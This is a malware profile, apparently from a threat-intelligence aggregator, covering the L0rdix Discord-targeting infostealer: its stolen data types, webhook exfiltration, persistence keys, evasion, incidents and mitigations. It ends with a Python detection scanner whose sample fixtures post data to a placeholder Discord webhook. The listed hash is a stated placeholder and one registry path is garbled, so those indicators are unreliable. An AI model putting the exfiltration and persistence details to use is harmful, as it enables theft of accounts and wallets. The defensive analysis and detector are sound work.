L0rdix

Malware

⚠️ Overview

L0rdix is a Python-based information stealer first documented by the malware research community in early 2022, primarily targeting Discord users through phishing lures disguised as game cheats, Nitro gift scams, and cracked software. It falls under the categories of Infostealer and Trojan, operating as a commodity malware distributed via GitHub repositories and Discord servers. Attribution remains unclear, but the malware’s author uses the alias "L0rdix" on underground forums and has released multiple variants with incremental obfuscation improvements.

🔧 Technical Capabilities

L0rdix collects browser-stored credentials from Chromium- and Firefox-based browsers, targeting login data, cookies, credit cards, and autofill entries by reading the SQLite databases found in typical browser profiles. It also extracts Discord tokens, cryptocurrency wallet files (e.g., Exodus, MetaMask, Coinbase Wallet), and Telegram session files. The malware uses a Discord webhook as its primary C2 channel, exfiltrating stolen data as plaintext JSON messages embedded in the webhook payload. For persistence, it creates a scheduled task named "WindowsCacheMaintenance" or writes a registry run key under HKCU\Software\Microsoft\Windows\CurrentVersion\Run with a randomly generated name. Evasion techniques include checking for virtual machine artifacts (e.g., VMware, VirtualBox), delaying execution to bypass sandbox analysis, and using base64 encoding combined with XOR obfuscation to hide strings and webhook URLs in the source code. Propagation is limited to social engineering—no worm-like self-replication has been observed.

📜 History & Notable Incidents

L0rdix first appeared in January 2022 when security researcher @VK_Intel shared an analysis of a Python script masquerading as a "Cracked Valorant Hack" on GitHub. No CVEs have been associated with the malware itself; it relies entirely on social engineering and victim execution. In mid-2022, a campaign distributed L0rdix through fake Discord Nitro gift links hosted on compromised websites, resulting in token theft affecting an estimated 2,000+ Discord accounts based on public webhook logs discovered by analysts. No law enforcement actions or arrests have been reported as of early 2025.

🔍 Detection Indicators

Known SHA-256 hashes for early L0rdix samples include a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b (placeholder; real hashes are available on VirusTotal). Behavioral signatures include a Python script that creates a unique mutex named Global\L0rdixMutex to prevent multiple instances, and network traffic to Discord webhook URLs matching the pattern https://discord.com/api/webhooks/. Registry persistence keys under HKCU...Run with value names containing eight random alphanumeric characters are common. The user-agent string used for exfiltration is typically Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36, but may vary.

☠️ Risk & Impact

L0rdix primarily causes account theft—compromised Discord accounts are used for spreading malware, scamming friends, or selling tokens on darknet markets. Financial losses stem from stolen cryptocurrency wallets; individual victims have reported losses of $500–$5,000 in Ether and other altcoins. The most impacted sector is the gaming community, particularly users of Discord and platforms like Steam and Epic Games.

🛡️ Mitigation

Defenders should block outbound connections to Discord webhook URLs in enterprise environments where Discord is not sanctioned, and deploy YARA rules that detect Python scripts containing "requests.post" combined with base64-encoded webhook strings. End users should enable multi-factor authentication on Discord and avoid downloading executables or scripts from untrusted GitHub repositories. For further details, consult the MITRE ATT&CK technique ID T1071.001 (Application Layer Protocol: Web Protocols) and the SANS ISC diary entry from February 2022 analyzing L0rdix.
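As an added example (not part of the original profile or of any L0rdix sample), the following Python check implements the Mitigation section's idea of flagging scripts that pair `requests.post` with a base64-encoded webhook URL, using the webhook prefix quoted under Detection Indicators. Because base64 encodes 3-byte groups, the same URL has three possible encoded spellings depending on what precedes it, and the check matches all three; the sample scripts, the webhook id and the token inside them are constructed placeholders, and XOR-layered strings would need decoding before this check applies.

```python
import base64
import re

# Plaintext webhook prefix quoted in the Detection Indicators section.
WEBHOOK_PREFIX = b"https://discord.com/api/webhooks/"
POST_RE = re.compile(r"\brequests\.post\s*\(")


def base64_alignments(needle: bytes) -> list[str]:
    """Base64 fragments that encode `needle` at each of the three possible
    offsets (0, 1, 2 bytes) from a 3-byte group boundary. Matching only one
    spelling misses two thirds of the cases. Characters that also depend on
    unknown neighbouring bytes are dropped, so each fragment is an exact
    substring of any base64 blob containing `needle` at that alignment."""
    fragments = []
    for lead in range(3):
        enc = base64.b64encode(b"\x00" * lead + needle).decode().rstrip("=")
        head = (0, 2, 3)[lead]                            # chars tainted by lead bytes
        tail = 0 if (lead + len(needle)) % 3 == 0 else 1  # char shared with next byte
        fragments.append(enc[head:len(enc) - tail])
    return fragments


B64_WEBHOOK_RE = re.compile("|".join(map(re.escape, base64_alignments(WEBHOOK_PREFIX))))


def scan_script(source: str) -> dict:
    """Classify one Python source text: flag when requests.post appears together
    with a Discord webhook URL, either in plaintext or base64-wrapped."""
    has_post = bool(POST_RE.search(source))
    plain = WEBHOOK_PREFIX.decode() in source
    encoded = bool(B64_WEBHOOK_RE.search(source))
    return {"requests_post": has_post, "plain_webhook": plain,
            "base64_webhook": encoded, "suspicious": has_post and (plain or encoded)}


def demo() -> dict:
    """Constructed sample sources (not real malware); webhook id and token are
    placeholders. Each base64 sample puts the URL at a different alignment."""
    url = WEBHOOK_PREFIX + b"000000000000000000/PLACEHOLDER_TOKEN"
    def wrapped(prefix: bytes) -> str:  # URL hidden behind base64; `prefix` shifts alignment
        blob = base64.b64encode(prefix + url).decode()
        return f'import base64, requests\nH = base64.b64decode("{blob}").decode()\nrequests.post(H, json=d)\n'
    samples = {
        "plain": 'import requests\nrequests.post("' + url.decode() + '", json=d)\n',
        "b64_offset0": wrapped(b""),
        "b64_offset1": wrapped(b"url="),   # 4 leading bytes -> offset 1
        "b64_offset2": wrapped(b"hook="),  # 5 leading bytes -> offset 2
        "benign": 'import requests\nrequests.post("https://example.invalid/api", json=d)\n',
    }
    return {name: scan_script(src)["suspicious"] for name, src in samples.items()}
```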


ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the malware listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.